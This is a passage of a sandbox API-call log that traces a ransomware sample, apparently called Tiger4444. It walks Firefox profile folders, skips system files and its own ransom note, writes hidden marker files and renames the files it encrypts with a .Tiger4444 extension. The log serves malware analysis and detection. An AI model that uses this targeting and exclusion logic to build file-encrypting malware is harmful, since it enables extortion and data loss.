(in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.255] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.255] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.256] CloseHandle (hObject=0x2ac) returned 1 [0051.256] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent") returned 91 [0051.256] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.256] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c2e4c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x41de8bd2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x8390b2de, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73048 [0051.256] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.256] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.256] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.256] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.257] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c2e4c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x41de8bd2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x8390b2de, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.257] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.257] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.257] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.257] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.257] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.257] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8390b2de, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8390b2de, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8390b2de, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.257] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.257] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.257] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c2e4c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x246c9b2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x246c9b2, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chrome", cAlternateFileName="")) returned 1 [0051.257] lstrcmpiW (lpString1="chrome", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.257] lstrcmpiW (lpString1="chrome", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.257] lstrcmpiW (lpString1="chrome", lpString2="Tiger4444.exe") returned -1 [0051.257] lstrcmpiW (lpString1="chrome", lpString2=".") returned 1 [0051.257] lstrcmpiW (lpString1="chrome", lpString2="..") returned 1 [0051.257] lstrcmpiW (lpString1="chrome", lpString2="windows") returned -1 [0051.257] lstrcmpiW (lpString1="chrome", lpString2="bootmgr") returned 1 [0051.257] lstrcmpiW (lpString1="chrome", lpString2="pagefile.sys") returned -1 [0051.257] lstrcmpiW (lpString1="chrome", lpString2="boot") returned 1 [0051.257] lstrcmpiW (lpString1="chrome", lpString2="ids.txt") returned -1 [0051.257] lstrcmpiW (lpString1="chrome", lpString2="NTUSER.DAT") returned -1 [0051.257] lstrcpyW (in: lpString1=0x30aeb60, lpString2="chrome" | out: lpString1="chrome") returned="chrome" [0051.257] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc86f20 [0051.257] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc6) returned 0xc8e0d0 [0051.257] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc86f28 | out: ListHead=0xc66828, ListEntry=0xc86f28) returned 0xc5a728 [0051.257] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41de8bd2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x41ea4c3c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x41ea601c, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="moz-safe-about+home", cAlternateFileName="MOZ-SA~1")) returned 1 [0051.257] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.257] lstrcmpiW (lpString1="moz-safe-about+home", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.257] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="Tiger4444.exe") returned -1 [0051.257] lstrcmpiW (lpString1="moz-safe-about+home", lpString2=".") returned 1 [0051.257] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="..") returned 1 [0051.257] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="windows") returned -1 [0051.257] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="bootmgr") returned 1 [0051.257] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="pagefile.sys") returned -1 [0051.257] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="boot") returned 1 [0051.257] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="ids.txt") returned 1 [0051.257] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="NTUSER.DAT") returned -1 [0051.257] lstrcpyW (in: lpString1=0x30aeb60, lpString2="moz-safe-about+home" | out: lpString1="moz-safe-about+home") returned="moz-safe-about+home" [0051.257] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc86da0 [0051.258] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xe0) returned 0xc81d40 [0051.258] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc86da8 | out: ListHead=0xc66828, ListEntry=0xc86da8) returned 0xc86f28 [0051.258] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41de8bd2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x41ea4c3c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x41ea601c, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="moz-safe-about+home", cAlternateFileName="MOZ-SA~1")) returned 0 [0051.258] FindClose (in: hFindFile=0xc73048 | out: hFindFile=0xc73048) returned 1 [0051.258] lstrcpyW (in: lpString1=0x30aeb60, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.258] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.259] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0051.259] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.260] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.260] CloseHandle (hObject=0x260) returned 1 [0051.260] CloseHandle (hObject=0x2ac) returned 1 [0051.260] GetCurrentThreadId () returned 0xfa8 [0051.260] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc86da8 [0051.260] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home" [0051.260] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.260] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc86da0 | out: hHeap=0xc50000) returned 1 [0051.260] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home" [0051.260] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\" [0051.260] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.BFC0E91B00AE8A0620D3" [0051.260] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.263] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.276] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.277] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.277] CloseHandle (hObject=0x2ac) returned 1 [0051.278] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home") returned 111 [0051.278] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.278] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41de8bd2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x41ea601c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x83931478, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0051.278] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.278] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.278] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.278] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.278] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41de8bd2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x41ea601c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x83931478, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.278] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.278] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.278] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.278] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.278] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.278] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83931478, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83931478, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x839579c4, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.278] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.278] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.278] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41de9f5b, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x41de9f5b, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x41de9f5b, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x2e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".metadata", cAlternateFileName="METADA~1")) returned 1 [0051.278] lstrcmpiW (lpString1=".metadata", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.279] lstrcmpiW (lpString1=".metadata", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.279] lstrcmpiW (lpString1=".metadata", lpString2="Tiger4444.exe") returned -1 [0051.279] lstrcmpiW (lpString1=".metadata", lpString2=".") returned 1 [0051.279] lstrcmpiW (lpString1=".metadata", lpString2="..") returned 1 [0051.279] lstrcmpiW (lpString1=".metadata", lpString2="windows") returned -1 [0051.279] lstrcmpiW (lpString1=".metadata", lpString2="bootmgr") returned -1 [0051.279] lstrcmpiW (lpString1=".metadata", lpString2="pagefile.sys") returned -1 [0051.279] lstrcmpiW (lpString1=".metadata", lpString2="boot") returned -1 [0051.279] lstrcmpiW (lpString1=".metadata", lpString2="ids.txt") returned -1 [0051.279] lstrcmpiW (lpString1=".metadata", lpString2="NTUSER.DAT") returned -1 [0051.279] lstrcpyW (in: lpString1=0x30aeb88, lpString2=".metadata" | out: lpString1=".metadata") returned=".metadata" [0051.279] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata", dwFileAttributes=0x0) returned 1 [0051.279] lstrlenW (lpString=".metadata") returned 9 [0051.279] lstrlenW (lpString="Tiger4444") returned 9 [0051.279] lstrcmpiW (lpString1=".metadata", lpString2="Tiger4444") returned -1 [0051.279] lstrlenW (lpString=".dll") returned 4 [0051.280] lstrcmpiW (lpString1="data", lpString2=".dll") returned 1 [0051.280] lstrlenW (lpString=".lnk") returned 4 [0051.280] lstrcmpiW (lpString1="data", lpString2=".lnk") returned 1 [0051.280] lstrlenW (lpString=".ini") returned 4 [0051.280] lstrcmpiW (lpString1="data", lpString2=".ini") returned 1 [0051.280] lstrlenW (lpString=".sys") returned 4 [0051.280] lstrcmpiW (lpString1="data", lpString2=".sys") returned 1 [0051.280] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.280] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.280] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14273302769) returned 1 [0051.280] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=46) returned 1 [0051.280] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0051.280] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0051.280] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x330, lpName=0x0) returned 0x2c8 [0051.281] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x330) returned 0xbe0000 [0051.282] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc81d40 [0051.282] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0051.282] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.282] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0051.282] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0051.282] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0051.282] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.282] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0051.282] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14273540438) returned 1 [0051.282] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0051.282] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0051.282] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.282] CloseHandle (hObject=0x2c8) returned 1 [0051.283] CloseHandle (hObject=0x260) returned 1 [0051.283] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata.Tiger4444") returned 131 [0051.283] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata.tiger4444"), dwFlags=0x1) returned 1 [0051.283] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41e667ed, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x41e667ed, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x41e667ed, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x3b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".metadata-v2", cAlternateFileName="METADA~2")) returned 1 [0051.283] lstrcmpiW (lpString1=".metadata-v2", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.283] lstrcmpiW (lpString1=".metadata-v2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.283] lstrcmpiW (lpString1=".metadata-v2", lpString2="Tiger4444.exe") returned -1 [0051.283] lstrcmpiW (lpString1=".metadata-v2", lpString2=".") returned 1 [0051.283] lstrcmpiW (lpString1=".metadata-v2", lpString2="..") returned 1 [0051.283] lstrcmpiW (lpString1=".metadata-v2", lpString2="windows") returned -1 [0051.283] lstrcmpiW (lpString1=".metadata-v2", lpString2="bootmgr") returned -1 [0051.283] lstrcmpiW (lpString1=".metadata-v2", lpString2="pagefile.sys") returned -1 [0051.283] lstrcmpiW (lpString1=".metadata-v2", lpString2="boot") returned -1 [0051.283] lstrcmpiW (lpString1=".metadata-v2", lpString2="ids.txt") returned -1 [0051.283] lstrcmpiW (lpString1=".metadata-v2", lpString2="NTUSER.DAT") returned -1 [0051.283] lstrcpyW (in: lpString1=0x30aeb88, lpString2=".metadata-v2" | out: lpString1=".metadata-v2") returned=".metadata-v2" [0051.283] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2", dwFileAttributes=0x0) returned 1 [0051.284] lstrlenW (lpString=".metadata-v2") returned 12 [0051.284] lstrlenW (lpString="Tiger4444") returned 9 [0051.284] lstrcmpiW (lpString1="tadata-v2", lpString2="Tiger4444") returned -1 [0051.284] lstrlenW (lpString=".dll") returned 4 [0051.284] lstrcmpiW (lpString1="a-v2", lpString2=".dll") returned 1 [0051.284] lstrlenW (lpString=".lnk") returned 4 [0051.284] lstrcmpiW (lpString1="a-v2", lpString2=".lnk") returned 1 [0051.284] lstrlenW (lpString=".ini") returned 4 [0051.284] lstrcmpiW (lpString1="a-v2", lpString2=".ini") returned 1 [0051.284] lstrlenW (lpString=".sys") returned 4 [0051.284] lstrcmpiW (lpString1="a-v2", lpString2=".sys") returned 1 [0051.284] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.284] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.284] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14273716282) returned 1 [0051.284] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=59) returned 1 [0051.284] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0051.284] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0051.284] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x340, lpName=0x0) returned 0x2c8 [0051.286] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x340) returned 0xbe0000 [0051.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc81d40 [0051.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0051.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0051.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0051.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0051.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0051.287] 